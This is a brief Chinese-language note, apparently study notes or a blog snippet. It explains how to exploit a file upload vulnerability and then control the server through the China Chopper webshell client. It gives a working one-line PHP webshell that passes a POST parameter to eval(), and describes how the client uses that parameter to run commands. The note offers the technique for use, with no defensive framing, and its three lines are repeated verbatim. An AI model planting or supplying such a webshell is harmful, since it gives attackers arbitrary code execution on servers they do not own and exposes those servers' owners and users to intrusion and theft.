利用文件上传漏洞,使用中国菜刀控制服务器;
添加URL指向所上传的包含一句话木马的文件,网上教程都有(侵删):
假设一句话是:<?php eval($_POST['ee']); ?>;URL后面就填ee,是参数名(key),中国菜刀向服务器发送key-value,服务器使用PHP eval()函数解析执行;
利用文件上传漏洞,使用中国菜刀控制服务器;
添加URL指向所上传的包含一句话木马的文件,网上教程都有(侵删):
假设一句话是:<?php eval($_POST['ee']); ?>;URL后面就填ee,是参数名(key),中国菜刀向服务器发送key-value,服务器使用PHP eval()函数解析执行;